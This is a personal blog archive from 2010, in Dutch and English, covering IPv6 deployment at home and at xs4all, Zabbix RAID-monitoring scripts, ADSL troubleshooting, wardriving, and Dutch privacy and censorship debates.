News archive - Koos van den Hout

Goed nieuws van mijn favoriete provider xs4all: 26 augustus 2010 Vanaf vandaag: IPv6 voor iedereen.

Uit het persbericht:

XS4ALL MAAKT ALS EERSTE IPv6 VOOR ALLE KLANTEN BESCHIKBAAR

Vanaf vandaag start XS4ALL officieel met het leveren van IPv6. De huidige internetadressen (IPv4) zullen naar verwachting binnen een jaar op zijn en de provider werkt daarom al geruime tijd aan implementatie van het nieuwe protocol IPv6. Wanneer de wereldwijde voorraad IPv4-adressen straks uitgeput is, kunnen nieuwe verbindingen en diensten alleen via IPv6 op internet worden aangesloten. XS4ALL biedt haar klanten de gelegenheid zich daarop nu al voor te bereiden.

Het inschakelen van IPv6 op een xs4all DSL aansluiting is nu gewoon een kwestie van een vinkje in het servicecentrum. IPv6 nu al voor iedereen mogelijk bij XS4ALL - XS4ALL nieuws

Gefeliciteerd xs4all!

I like nice images, usually photographs I made myself or interesting images from the Transmission Gallery which has a great set of transmission wallpapers.

I collect a few in a directory, and there is an easy way to show these on an X background when you use xscreensaver anyway:

$ xscreensaver-getimage -directory background -root

This will select a random image from directory 'background' and display it on the root window.

When I want to make IPv4-legacy-only services available via IPv6 there are some options: an application-specific proxy like the prolocation ipv6 proxy based on squid. A number of high-profile sites are available this way, including for example:

$ host www.spitsnieuws.nl
www.spitsnieuws.nl is an alias for spitsnieuws.nl.
spitsnieuws.nl has address 81.173.64.62
spitsnieuws.nl has IPv6 address 2a00:d00:ff:131:94:228:131:131
spitsnieuws.nl mail is handled by 100 smtpscan-nl1.telegraaf.nl.
spitsnieuws.nl mail is handled by 100 smtpscan-nl2.telegraaf.nl.

But that is web-only. And with some reloads I can make it show a http 503 proxy error which is not the answer I want to see on a high-profile website like www.spitsniews.nl as a visitor, let alone as the owner of the site or the advertiser.

Something I have mentioned before: if you want to implement IPv6 correctly, give it the same amount of monitoring and care as IPv4. Otherwise you're making yourself hard to reach for IPv6-enabled visitors which may damage either your website image or the image of IPv6. Both are bad.

The other option is not the application proxy but address translation. With IPv6 allocations every IPv6 end-user gets enough address space to map the entire IPv4 Internet. I have been thinking about that option for a while and then I came across NAT is evil - www.me.uk RevK's rants. Not IPv4 NAT as we know it, but NAT64 translating IPv6 address space to IPv4 address space. The trick or treat daemon mentioned in the article is the nameserver part for doing DNS64.

But the hard translating work will need to be done in pTRTd, the Portable Transport Relay Translator Daemon.

The default is dangerous from a firewall perspective: you still set up a proxy for the entire IPv4 address space. But with some serious firewall rules on the IPv6 side (default drop and only allow certain addresses and services). I could see an option to do some experimenting with this at work, very carefully selecting certain outward facing services, setting up the firewall and publishing the AAAA records in DNS.

Yes, NAT is evil. NAT64 is evil too, it hides the entire IPv6 Internet behind one IPv4 address without any headers to indicate what the original address was (which the squid proxy solution does offer). But that is one more incentive to upgrade the service to native IPv6 connectivity.

Bericht van de HCC vandaag:

MagEvents heeft vandaag laten weten dat HME 2010 dit jaar niet doorgaat. HCC!dagen vormden een onderdeel van HME2010. De beurs stond gepland voor 5 tot en met 7 november in de Jaarbeurs Utrecht. Voornaamste reden van het niet doorgaan van het Home Multimedia Event is een combinatie van onvoldoende belangstelling bij exposanten en de verschillende interessegebieden.

Maar misschien komt er weer iets HCC-eigen:

HCC beraadt zich op dit moment op de mogelijkheden om een alternatief evenement aan haar leden te bieden.

Aan de ene kant hoop ik dat er weer iets a la de "oude" HCC dagen komt. Aan de andere kant is dat iets wat door de opkomst van het web minder voor de hand ligt. De zware 'hobbyisten' vinden elkaar in newsgroups en forums over de hele wereld, de koopjesjagers zoeken het hele jaar op websites.

Ooit in een krantebericht de huishoudbeurs voor mannen genoemd wat in 2008 nog door de organisatie van HME2008 is overgenomen gezien Terugblik Multimedia Event 2008.

Volgens mij is het in 2000 misgegaan met de HCC: HCC: Een ANWB voor computergebruikers - archief FEM Business.

Het waait stevig.. let ook op de windvlaggetjes op weather.idefix.net Nederland 2010-08-23 14:00 .. vooral de waarnemingen over zee hebben tot 9 Beaufort! Waarnemingsposten EHKV en EHQE.
Update: Op 15:00 nog meer harde wind, windkracht 10 op EHKV weather.idefix.net Nederland 2010-08-23 15:00.

EHKV = oil platform K14-fa-1c in the Northsea.

Shednet is up

Server and network in the shed, up and running complete with IPv6. It won't get an IP55 rating (being able to deal with a bit of water) but it pings, measures the powerline network throughput and makes pretty graphs of that throughput.

Somehow I found this an interesting sight to photograph. And I like the term Shednet.
Update 2010-08-22: I remembered why I originally got the idea to test a PC in the shed: to test a weather-station in the shed as a preparation for doing something again for project sundial. The "powered by alternative energy" part of that project isn't going to be implemented: solar panels would be really expensive but something really low-power with Linux in a (semi-)outdoor housing would work nicely for a weather station and ntp server.

So the first component is tested: I can get a system running there complete with network. Now to find some time to set up the PC and a weather station and measure temperature and humidity in the shed.

Kom op, wat meer debat over privacy-kwesties zou zeer welkom zijn - Trouw

Inderdaad. De plannen waar naar verwezen worden klinken weer erg als het idee van precrime uit de film Minority Report.

Dat soort plannen heeft de Raad van Korpschefs wel vaker. Gelukkig heeft de Raad van Korpschefs helemaal niets te zeggen over het justitie beleid in Nederland. Al zouden ze dat graag willen dus doen ze soms maar vast alsof.

Maar het is aardig van die Raad dat ze er ons er weer eens op wijzen dat de Nederlandse politie graag verregaand de Nederlandse rechtsbeginsels zou overtreden. Niet alleen verkeersagenten op de weg vinden dat ze de wet alleen hoeven te handhaven en zich er niet aan houden. Rechercheurs grasduinen graag in CIOT gegevens. En ook korpschefs van politie vinden blijkbaar dat de Nederlandse grondwet en rechtsbeginsels niet op hun van toepassing zijn. Alleen is dat op een niveau wat een stuk gevaarlijker is voor de samenleving.

Het laatste nummer van het c't magazine voor computer techniek heeft een mooie advertentie achterop van hetzner hosting waarin ze root servers (in duitsland gebruikte term voor dedicated servers die niet gevirtualiseerd zijn en waar je dus toegang hebt tot de hardware) aanbieden. Met gewoon "IPv6 Running" in de advertentie.

Goed om te zien dat bedrijven die op grote schaal actief zijn op Internet ook IPv6 serieus gaan nemen, het implementeren en er dan ook gewoon mee gaan adverteren.

Binnenkort gaat informatica verhuizen en dat betekend dat we afscheid moeten nemen van het 'museum' met oude computers. We hebben altijd wat modellen oude hardware bewaard (HP, Sun, Cisco, Unicorn) om te kunnen laten zien waar we vroeger mee werkten. Maar dat kan niet langer.. met alle bezuinigings operaties bij de universiteit is 'ruimte' een van de dingen waar momenteel flink gekort wordt in de hoop de financien weer op orde te krijgen. En dus zijn er na een komende verhuizing geen planken meer om de historie op te bewaren en mag het allemaal richting recycling. Dus maar snel wat rondgemailed naar wat misschien geinterreseerde mensen.

Ik heb nu alles gemigreerd naar de native IPv6. Nouja, bijna alles: via rulebased routing worden wat openstaande tcp sockets op tunnel adressen nog afgehandeld via de tunnel. Vooral irc is goed in het langdurig openhouden van tcp sockets. En die verbindingen wil ik natuurlijk niet stukmaken.

Kleine ergernis blijft dat netstat -n numerieke IPv6 adressen blijft afkappen.

With ubuntu 8.04 server on the home server greenblatt I got a daily mail:

Subject: Cron  test -x /usr/sbin/anacron || ( cd / &&          
        run-parts --report /etc/cron.daily )                                    

/etc/cron.daily/logrotate:                                                      
Re-opening all log files                                   
Re-opening all log files                                                        
Re-opening all log files                                               

And I couldn't really find the source. But a google search for logrotate mail 're-opening' helps: It is caused by logrotate and mailman, filed as Bug #244233 in mailman (Ubuntu): “Logrotate is noisy with: Re-opening all log files. The fix is simple: make mailman be quiet in /etc/logrotate.d/mailman. A patch is attached to the ubuntu bug.

Ondertussen heeft de support van epag de IPv6 nameserver records bijgewerkt:

   Server Name: NS2.IDEFIX.NET
   IP Address: 2001:980:14CA:42:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH
   Whois Server: whois.enterprice.net
   Referral URL: http://www.enterprice.net

   Server Name: NS2.VANDENHOUT.COM
   IP Address: 2001:980:14CA:42:0:0:0:694
   IP Address: 82.95.196.202
   Registrar: EPAG DOMAINSERVICES GMBH
   Whois Server: whois.enterprice.net
   Referral URL: http://www.enterprice.net

dus nu heb ik alle nameserver adressen over naar de nieuwe adresreeks. Alle IPv6 adressen in alle DNS zones zijn over, dus nu is het 'afbouwen'. Ik moet voor wat nntp over IPv6 verkeer nog even de 'oude' uitgaande adressen gebruiken maar zodra dat over is zal het verkeer over de IPv6 tunnel minimaal zijn. Niet 0: er staan wat langdurige tcp sockets open. Die laat ik vooral lekker doorlopen, dus het zal nog even duren eer de IPv6 tunnel definitief uit kan.

De 'geschiedenis' van mijn ipv6 tunnel is ook wel leuk:

• Op 25 september 2001 had ik een xs4all aansluiting
• Op 27 september 2001 had ik de adsl tunnel aan de gang .. tunnel 17 van de nu naar schatting ruim 4300.

Native IPv6 over ppp-gebaseerde aansluitingen duurde dus nog bijna 9 jaar. Misschien is de 9e verjaardag een mooi moment voor het afsluiten.

Erik Huizer doet een stevige uitspraak over IPv6 invoering in 'Deel ISP's gaat failliet aan IPv6':

Het zou de voorzitter van de IPv6 Task Force 'niet verbazen' wanneer een aantal ISP's 'op zijn minst klanten op verliezen en op een gegeven moment failliet gaan. Als je als service provider op dit moment nog niet bezig bent met IPv6 dan ben je geen knip voor je neus waard. Dan ben je echt te laat.

Misschien dat er bij wat bedrijven toch iemand wakker schrikt en zich afvraagt hoe de IPv6 voortgang is.

Vandaag was de grote omnummeractie van de xs4all IPv6 proef. De IPv6 range die ik nu thuis gekregen heb is 'stabiel'. Nouja, tot aan verhuizingen en hernummer acties, dus even stabiel als de IPv4 toewijzing en garantie tot aan de bekende deur.

Maar nu ben ik dus alles thuis gaan omnummeren naar de nieuwe IPv6 range. Nog heel wat werk, de IPv6 adressen stonden op heel wat plekken al ingevoerd.

Toch wil ik de 'native' IPv6 gaan gebruiken, dat heeft de toekomst.

Het voordeel van IPv6 is natuurlijk dat je thuis bijna ongelimiteerde aantallen adressen hebt. En dat is bij een beetje leuke setup ook een nadeel. Ik heb maar een extra interface aangemaakt op de server waar alle 'services' IPv6 adressen aanhangen. Aan de ppp interface hangen is niet zo handig: die verdwijnt en verschijnt als de ADSL lijn serieus 'hik' doet en dan zijn alle specifieke bindings ook weer stuk. Er is nu op de server gewoon een eth0.42 waarop alle 'service' IPv6 adressen toegevoegd zijn zijn, zowel de nieuwe als de oude. Alle nieuwe 'service' adressen zijn natuurlijk niet meer in eenzelfde /64 als in gebruik op een andere interface.

Enfin, het belangrijkste:

$ dig +short idefix.net aaaa
2001:980:14ca:42::18

En natuurlijk, via de nieuwe verbinding:

$ ping6 -nc 5 ping6.xs4all.nl
PING ping6.xs4all.nl(2001:888:0:1::666) 56 data bytes
64 bytes from 2001:888:0:1::666: icmp_seq=1 ttl=61 time=28.0 ms
64 bytes from 2001:888:0:1::666: icmp_seq=2 ttl=61 time=28.3 ms
64 bytes from 2001:888:0:1::666: icmp_seq=3 ttl=61 time=17.2 ms
64 bytes from 2001:888:0:1::666: icmp_seq=4 ttl=61 time=17.1 ms
64 bytes from 2001:888:0:1::666: icmp_seq=5 ttl=61 time=17.1 ms

--- ping6.xs4all.nl ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4005ms
rtt min/avg/max/mdev = 17.151/21.600/28.322/5.393 ms

Interresante berichtgeving naar aanleiding van een rapport van Stratix over de glasvezel-aanleg in Nederland. Een mooie opmerking in het Parool:

Een andere opmerkelijke bevinding van de onderzoekers is, dat inwoners van de grote steden in de Randstad weinig trek hebben in glasvezel. Sterker nog: glasfiber is in Nederland voornamelijk een aangelegenheid van kleine gemeenten op het platteland buiten de Randstad.

Amsterdammer wil geen supersnel internet via glasfiber - Het Parool

Hier komt ook weer boven dat kleine plaatsen waar telefoon en kabel-aanbieder (nog) geen snel Internet aanbieden en waar de buren nog met elkaar praten eerder kans maken op glasvezel dan grote steden.

Straks krijgen we een omgekeerde digital divide in Nederland: dan moet je echt in een boerendorp wonen om supersnel Internet te krijgen.

I enhanced the zabbix system monitoring to also work on aacraid based controllers. Google searching found me How to check the health of an Adaptec RAID array which shows that the right command-line tool is nowadays arcconf which can be found at Adaptec support for RAID products. Select the right type and click through a few times where you will find the storage manager downloads (not the drivers!). The latest 'adaptec storage manager' includes 'arcconf'. After installing arcconf produces a lot of output, but the line I am interested in is easy to find:

# /usr/StorMan/arcconf GETCONFIG 1 | grep Defunct
   Defunct disk drive count                 : 0

which is exactly what I want. Again a special UserParameter in zabbix_agentd.conf:

UserParameter=aacraid.okdisk,/etc/zabbix/external/aacraid.okdisk

A script to do the actual work:

#!/bin/sh
# aacraid.okdisk

sudo /usr/StorMan/arcconf GETCONFIG 1 | awk ' /Defunct disk drive count/ { print $6 } '

And a change in sudoers to allow this. Allowing /usr/StorMan/arcconf as is did not work because of the capitals but a more general rule helped. Now I can check for the number of disks with problems and warn accordingly (0 disks with problems is ok, 1 disk is warning, > 1 is disaster).

De adsl snelheid is nu helemaal gezakt. Na eerdere problemen met hikken heb ik weer eens xs4all gebeld. Hun oplossing was nu om de lijn terug te zetten naar een 12 megabit profiel. Dat ging een tijdje goed en leverde een stabiele lijn op maar toen ging het weer mis...

=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.992.5 Annex B
Channel Mode          :  interleaved 
Number of resets      :  6 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :             17.5              9.0 
Attenuation  [dB]     :             20.5             12.0 
OutputPower  [dBm]    :             10.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            13389             5677 
  Upstream            :             2426             1029 


Transfer statistics
    Errors 
      Received FEC    :           816402 
      Received CRC    :           222198 
      Received HEC    :             7040 
      Transmitted FEC :                0 
      Transmitted CRC :             8329 
      Transmitted HEC :             8097 

     Near end failures since reset
      Loss of frame:          0 failures 
      Loss of signal:         0 failures 
      Loss of power:          0 failures 
      Errored seconds:     2830 seconds  
     Near end failures last 15 minutes
      Loss of frame:          0 seconds 
      Loss of signal:         0 seconds 
      Loss of power:          0 seconds 
      Errored seconds:        1 seconds 
     Near end failures current day 
      Errored seconds:        4 seconds 
     Near end failures previous day 
      Errored seconds:     2826 seconds 

Minder dan 6000 kilobit, tijd om er weer eens achteraan te zitten. Het lijkt alsof er een verband is met regenbuien, en dan moet er echt eens door KPN naar de lijn gekeken worden...

As part of the work on system monitoring I am looking into monitoring RAID units. The beta-ict department uses a number of raid units and data gets replicated between buildings.

I want a warning when a disk goes down. The 3ware disk controller has a nice webinterface but I can't integrate that (easily..) into zabbix. What I did was install the tw_cli command line utility from the 3ware LSI raid controller site (lookup your type of controller, find 'support and downloads' and you will see cli utils for lots of unix versions), which makes life easy:

# tw_cli show

Ctl   Model        (V)Ports  Drives   Units   NotOpt  RRate   VRate  BBU
------------------------------------------------------------------------
c0    9650SE-16ML  16        15       1       1       1       1      OK

What I want to know is the number of not-optimal disks (yes, indeed one is broken at the moment and needs replacement). That I can monitor in zabbix, when I pick up the value with a script:

#!/bin/sh
# /etc/zabbix/external/3ware.okdisk

sudo /usr/local/sbin/tw_cli show | awk ' /^c0/ { print $6 } '

Root access via sudo which means a line in /etc/sudoers which allows /usr/local/sbin/tw_cli from the zabbix user, and the right setting in zabbix_agentd.conf to bind this script to a user parameter:

UserParameter=3ware.okdisk,/etc/zabbix/external/3ware.okdisk

Now I can program a trigger on the output: 0 is ok, 1 is warning, > 1 is disaster. I added an extra action on the trigger to mail the output of tw_cli '/c0 show' to the admins so we know which disk is broken.

Now to do the same for adaptec (aacraid) based raids.

Interesting patterns in the security logs again:

Aug 10 00:19:42 greenblatt sshd[22045]: Bad protocol version identification '\200b\001\003\001' from 207.70.60.20
Aug 10 00:19:43 greenblatt sshd[22071]: Bad protocol version identification '\200b\001\003\001' from 209.19.175.124
Aug 10 00:19:44 greenblatt sshd[22072]: Bad protocol version identification '\200b\001\003\001' from 207.70.47.249
Aug 10 00:19:45 greenblatt sshd[22073]: Bad protocol version identification '\200b\001\003\001' from 207.70.41.212
Aug 10 00:19:45 greenblatt sshd[22074]: Bad protocol version identification '\200b\001\003\001' from 207.70.39.65
Aug 10 00:19:46 greenblatt sshd[22075]: Bad protocol version identification '\200b\001\003\001' from 69.5.238.171
Aug 10 00:19:47 greenblatt sshd[22076]: Bad protocol version identification '\200b\001\003\001' from 206.206.50.92
Aug 10 00:19:48 greenblatt sshd[22078]: Bad protocol version identification '\200b\001\003\001' from 207.70.3.141

Notice the timing. Makes me wonder what is going on.
Update: On twitter by @xs4cso:

Major rise in SSH brute force attacks and complaints overnight. Weak passwords to blame.

source
Update: Whois gives an interesting link between most of those IPs: they are all (but one) in network space owned by solution pro web hosting.

Diversificatie

In de huidige crisis tijd moet je als it-bedrijf wel zoeken naar andere richtingen voor je bedrijf.

After adding surge protection to the ISDN line coming into the asterisk server I went out and got the Trust surge guard PW-3500.

Note the This product is no longer available in the current Trust assortment on the Trust website. I bought it at mycom: Trust UPS & Overspanningsbeveiliging Surge PW-3500 - MyCom.nl and I noticed on the outside of the package that it does not mention whether it can be used with an ADSL modem, it just mentions phones and fax machines. A note about suppressing high-frequency interference made me wonder whether it might filter high-frequency signals on the phone line a bit too much, killing ADSL throughput. The salesperson at MyCom could not tell either. But MyCom has customer friendly policies for returning articles which aren't what you expected. Even "I could not make it run with Linux" is a valid reason for returning it. So I took it home, and first thing I noticed in the manual inside the package is that it states that this surge protector is also designed for ADSL. They could have mentioned that on the outside.

So now it is living in the phone line (and power supply) for the ADSL line.

In een volgens mij lange traditie heeft XS4ALL afscheid genomen van niet altijd even goed meewerkende hardware met een doffe dreun: 3FM ekstra weekend uit het raam: de Alteon loadbalancer van xs4all.
Volgens mij was er al in 1993 een (telefoon)modem wat bij buitendienststelling zeker een kopje water zou krijgen, alleen kan ik het verhaal niet terugvinden.

Noticed something new in the twitter user-interface today: "Who to follow". On the first view it sounds a bit like the amazon "People who bought this item might also like" where buying a book about parachute diving will give you a recommendation for clean underwear. But who I follow is a decision I make myself, and I need more information.

So, my recommendations to Twitter:

• An off-switch. Completely, not just collapsing it but gone from my view.
• An information popup when I hover over the name just like in the timeline.
• An off-switch. I mean it.
• While you are at it: an off-switch for 'trending'.
• Did I mention the option to switch it off?

After reading When Lightning Strikes - by Johannes Ullrich - ISC sans diary I was reminded that I could do a bit more about surge protection. We don't live in Florida, but we have do have lightning storms and they can damage equipment.

The first step was easy: Rerouted a few cables, and now the incoming ISDN line goes through the network/phone/isdn surge protector on the APC back-ups CS 350VA. The surge protector is there, so it is a better idea to use it. I have seen the inside of an ISDN adsl splitter after a lightning strike and that was not a good sight.

Maybe I'll get a surge protector for the adsl modem too.

Soms is er tussen de rants, hacks en ipv6 promotie tijd voor heel ander persoonlijk nieuws:

Ik hoop vader te worden in december van dit jaar.

Het is nu al een bijzondere ervaring, en dat zal het straks vast nog veel meer worden.

---

Sometimes between all the rants, hacks and ipv6 promotion it is time for quite different personal news:

I hope to become a father in december of this year.

It is already a special experience, and it will probably get more special.

Vorige week bestelde ik wat bij de free record shop. Voor de voortgang was (natuurlijk) een e-mail adres nodig maar ik heb het "ontvang onze nieuwsbrief" vinkje toch echt uitgezet.

Maar toch..

From: Free Record Shop                           
Subject: Beste Koos, je kunt nu ook muziek downloaden via FRS.nl!               

..

Je ontvangt deze e-mail omdat je je hebt aangemeld voor de nieuwsbrief.      

Nee dat heb ik niet. Gelukkig heb ik een weggooibaar e-mail adres gebruikt.

Maar ik had van een bedrijf als freerecordshop beter verwacht. Zaken doen op Internet anno 2010 en dan een e-mail adres gelijk ongewenste e-mail sturen is op z'n zachts gezegd geen reclame.

There is an interesting relation between 'website with technical subject' and 'visitors with IPv6'. I counted the number of unique addresses of visitors via IPv6 to several websites I run for the month of July 2010 and found the following percentages:

• http://weather.idefix.net/ weather maps : 5% (1%)
• http://pictures.idefix.net/ pictures : 4% (2%)
• http://idefix.net/ my homepage : 2% (1%)
• http://netwerk.pcgg.nl/ hcc!pcgg netwerkgroep : 2% (2%)
• http://bbs.idefix.net/ BBS files : 1%
• http://webcam.idefix.net/ the webcam : <1%
• http://www.virtualbookcase.com/ The Virtual Bookcase : < 1%
• http://www.camp-wireless.org/ Camp Wireless : < 1%

Comparing it to July 2009 (percentages between parentheses) does show growth.

I've done some work on the weather map site. I'm improving the plotting script to have a better abstraction of data and plotting so I can do plots for multiple countries.

As a first I'm plotting Denmark. The reasons are simple: it's a not too big country and has a reasonable number of weather stations.

Weather maps Denmark.

Now to see if that gives visitors :)

I wanted to install an extra package on the wardriving box but found out that the choice of distribution: Debian etch is not available anymore, not even as 'oldstable'. A bit of searching finds that I need to look in the Debian distribution archives.

I'm not sure whether I'll keep using Debian versions for the wardrive-box. I want something nice and small and manageable, and the option for a custom kernel (no initrd, preferably no udev).

The interesting bit is that I built the wardriving box in January - February 2008 and it basically ran regularly since that time without software problems.

The extra package I wanted to try is lm_sensors, for the other project: Sundial. I was wondering how high/low the system temperature would get, and whether it would stay within the 0 - 50 ⁰C range. An IP55 rated case might be a good idea for use in the garden shed (which is semi-outdoors). The question is will the mainboard stay above 0 ⁰C when it is -15 ⁰C outside. I know from the wardriving box the Alix board generates some heat, but is it enough to keep itself warm.

The Alix.1c/1d have a temperature sensor, according to Getting started with voyage linux it should work with the w83627hf driver which indeed loads and gives a readout.

I came across the alix.1 series hardware while looking for something low-power for project sundial. Later calculations showed the 'powered by the sun or wind' part of that project would be too expensive compared to just using a plug.

Update: The archived etch works, but lm-sensors wants perl, which is not part of the stripped down debian on the wardrive box. For as far as I can see that is because there is one perl script included. Time to rebuild from source with that script removed.

Update 2010-08-03: Looking where you are going helps too: Voyage Linux is Debian-based but optimized for embedded apps. With debootstrap under Ubuntu or Debian I could set up a newer development environment for the wardrive box and test Voyage Linux.

Wardriving results 15 July - 1 August: 2800 new networks with GPS locations. I went down a few places in the WiGLE stats because other people found a lot more networks. That can happen. Maybe I'll catch up :)

XKCD: University Website, Randall Munroe, licentie Creative Commons Attribution-NonCommercial.

De XKCD: University Website is briljant. En uiterst herkenbaar. Precies de disjunctie die ik nu bij de Universiteit Utrecht in de verte hoor voorbij komen. Maar net zo goed wat ik meer dan 10 jaar geleden bij de Hogeschool van Utrecht hoorde. Ver daarvoor waren er wel projecten die er van uitgingen wat mensen zouden zoeken, maar zo tegen 2000 ging dat allemaal overboord en kwamen in plaats daarvan monster websites waar alles zou moeten staan wat volgens de voorlichters ooit gevraagd zou kunnen worden door bezoekers van de website, die daarvoor braaf op de homepage zouden beginnen en door allemaal hierarchische structuren heen zouden klikken. Direct linken naar het juiste onderwerp is volgens die voorlichters ook vooral niet de bedoeling.

Ik ben blij dat deze ergernis voor mij over is en dat ik er alleen nog maar vanaf de verre zijlijn om kan lachen. En als gebruiker van de website natuurlijk niet kan vinden wat ik zoek. Maar daar helpt google bij.

Update: Ook gemeld in het Digitale U-Blad met de titel Web.. some sense? naar aanleiding van het UU webpresence project wat al getypeerd is als Web Absence.

At work one of my main projects at the moment is improving monitoring for beta-ict. I am used to mon at the computer science department but that shows its age a bit and I wanted to try something newer.

The choice in monitoring system was mainly for something which could monitor both system variables (free disk space, free memory, system load, whether certain needed processes were running) and service availability (is the network available, is ldap available, are web servers up and not giving out weird error messages).

I chose zabbix. It has an interesting approach: it measures variables, stores results and trends and then you can do stuff with the stored data. Such as monitoring whether certain thresholds aren't crossed, so you can do your normal tests. Or more complicated monitoring of trends or changes. But you can also make graphs of that same data. And you can use the triggers to make nice long-term availability reports.

One thing I learned is that the suggestion in the manual to use a new version postgres (>= 8.3) is to be taken serious. With 8.0 the server running zabbix regularly got up to a load of 10 on adding new systems to be monitored and historic monitoring data was lost for certain time periods. Dumping the database, installing postgres 8.4 and importing the data again and continuing with the same setup made everything lots faster and no data has been lost since.

What is also interesting is the option to use remote proxies to gather data from otherwise firewalled networks and the option to split servers / services into groups. Eventually we may give the 1st-line servicedesk their own view of our zabbix server where they can view whether main services are available so they are aware of troubles before they need to ask us.

Again and again you see responses to IPv4-will-run-out stories like "but what if we reclaim space from ..." or "but what if we use more NAT". I found one of the best answers to all of these:

Optimizing the utilization of less than 25% of the address space in the face of the consumption rate on the 75% side simply cannot yield a meaningful result. It really is akin to rearranging the deck chairs on the Titanic.

Source: Re: Rate of growth on IPv6 not fast enough? and used several times before on IPv6 mailing lists.

In wat al de bijnaam / hashtag #censuurknop heeft het ministerie van justitie vandaag een wetsvoorstel gelanceerd om nog meer rechten naar zich toe trekken en een wetsbepaling te schrappen die juist als doel had censuur van staatswege te voorkomen. Het openbaar ministerie wil zonder tussenkomst van een rechter websites kunnen blokkeren of verwijderen.

De huidige tekst:

De ratio van de regeling is, zoals eerder aangegeven, de vrijheid van meningsuiting te ondersteunen. Artikel 7 van de Grondwet geeft aan de overheid de opdracht de vrijheid van meningsuiting te waarborgen en te stimuleren. Censuur van staatswege dient te worden voorkomen. Artikel 54a beoogt het gevaar in te dammen dat de tussenpersoon, mede gelet op zijn in belang toenemende rol in het proces van gegevensuitwisseling door middel van communicatienetwerken, zich genoodzaakt voelt tot preventieve censuur over te gaan teneinde strafrechtelijke aansprakelijkheid te voorkomen. De regeling dient een onbelemmerde informatie-uitwisseling en daarmee een grondbeginsel van de democratische rechtsstaat.

Bron: Aanpassingswet richtlijn inzake elektronische handel; Memorie van toelichting

Burgers van Nederland kunnen nog tot 30 September 2010 commentaar leveren op dit voorstel. Zoals het er staat in de Consultatie wetsvoorstel versterking bestrijding computercriminaliteit gaat het om het voorkomen van misbruik en staat daar niet 'Censuur van staatswege dient mogelijk gemaakt te worden'. Maar onze grondrechten vereisen dat justitie nooit dit soort vergaande maatregelen kan nemen zonder goedkeuring van een rechter.

Zoals bij de internetconsultatie staat worden opmerkingen gevraagd, met een voorkeur voor heldere en beknopte commentaren voorzien van een duidelijke motivering.

Ik nodig iedereen uit een reactie te geven (en juist graag die heldere, beknopte, leesbare en gemotiveerde reactie..). Al is het alleen maar om justitie duidelijk te maken dat onze grondrechten veel belangrijker zijn dan hun wensen voor een politiestaat.

Bron: Wetsvoorstel: OM krijgt aan/uit-knop voor websites - Bits of Freedom

Blijkbaar is Nederland goed kwa IPv6 voorbereidingen, maar gemiddeld kwa echte uitrol, volgens onderzoek door TNO: IPv6 Monitoring in Nederland: De Nulmeting.

Conclusies:

In vergelijking met ons omringende landen loopt Nederland mee in de voorhoede als het gaat om voorbereidingen voor de uitrol van IPv6. Nederland presteert gemiddeld als het gaat om de daadwerkelijke uitrol van IPv6.

En voor bijna ISPs om over na te denken en dan ook vooral iets mee te doen:

Indien aangenomen wordt dat de IPv4 adressen opraken tussen september 2011 en november 2012 dan is de voornaamste zorg het kunnen bieden van een IPv6 verbinding aan eindgebruikers.

Wanneer gaat uw ISP IPv6 aanbieden?

Het lijkt alleen maar erger te worden (of te zijn) met het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT) blijkt uit de laatste gegevens opsporingsdiensten negeren privacyregels telecomdatabank stelselmatig - Bits of Freedom. Omdat er geen enkele controle is of opvragingen rechtmatig zijn en geen enkele werkende notificatie naar de mensen wiens gegevens opgevraagd zijn gebruiken de opsporingsdiensten dus de ciot databank als een soort enorme grabbelton. De enige manier waarop dit veilig zou kunnen werken is dat er niet alleen duidelijke en strenge regels zijn (wat mij betreft kunnen die zijn "opsporingsambtenaren mogen alleen gebruiks-gegevens opvragen van een verdachte die verzameld zijn nadat een rechter toestemming heeft gegeven specifiek gegevens van die verdachte te gaan onderzoeken") maar dat er ook sancties op misbruik zijn. En geen sancties van het type "stout hoor, niet meer doen!" maar geldboetes bij overtredingen en ontslag op staande voet bij herhaalde overtredingen, en aan de persoon wiens gegevens ten onrechte zijn ingezien de optie geven om ook schadevergoeding te eisen. Alleen als de controleurs goed gecotroleerd worden zullen ze zich zelf aan de wet houden.

Eindrapport Audit CIOT 2009 (19.04.10) (PDF)
Eindrapport Audit CIOT 2008 (PDF)
Bits of Freedom, 'Analyse: pratijk bevragingen CIOT bijzonder zorgwekkend' (06.11.2009)

Update 2010-07-27: Tweede kamerlid Jeanine Hennis-Plasschaert (VVD) heeft kamervragen gesteld over de herhalende privacy schendingen met als achtergrond dat de samenleving moet kunnen vertrouwen op het correct werken van justitie. Bron: Minister moet privacyschending CIOT verantwoorden - nu.nl.

Mijn persoonlijke visie is dat justitie in de uitvoering vaak de gedachte lijkt aan te hangen "We zijn er om de wet te handhaven en niet om ons er aan te houden" dus ik heb dat vertrouwen allang niet meer. Maar als zelfs VVDers hier kritisch naar gaan kijken is het eerdere vertrouwen wat soms gewoon overkwam als blind vertrouwen (bij bijvoorbeeld Fred Teeven) echt aan het afnemen.

According to Google finally indexing the IPv6 internet - Fix6 the first sightings have been done of a googlebot with an IPv6 address. My IPv6-reachable websites haven't been blessed by a visit from the IPv6 googlebot yet. What will googlebot do when I post a link to http://[2001:980:14ca:42::18] ?

And on a different note about google: last year I noticed googledns did not give out AAAA records for www.google.com. I retested it and found it (now?) depends on where you ask. At a place not in the google IPv6 program:

koos@kolham:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.
koos@kolham:~$ dig +short @8.8.4.4 www.google.com aaaa
www.l.google.com.
koos@kolham:~$ 

And at a place in the google IPv6 program:

koos@greenblatt:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.
2a00:1450:8001::63
koos@greenblatt:~$ dig +short @8.8.4.4 www.google.com aaaa
www.l.google.com.
2a00:1450:8001::63
koos@greenblatt:~$ 

Yes, that first place needs to turn their plans about IPv6 into doing something with it.

Ik ben blij dat ik geen mobiel Internet van T-mobile gebruik: T-Mobile wil websites laten betalen voor doorgifte - Bits of Freedom waar ik mijn eigen commentaar aan heb toegevoegd (het lijkt weer ouderwets "bellheads versus netheads").

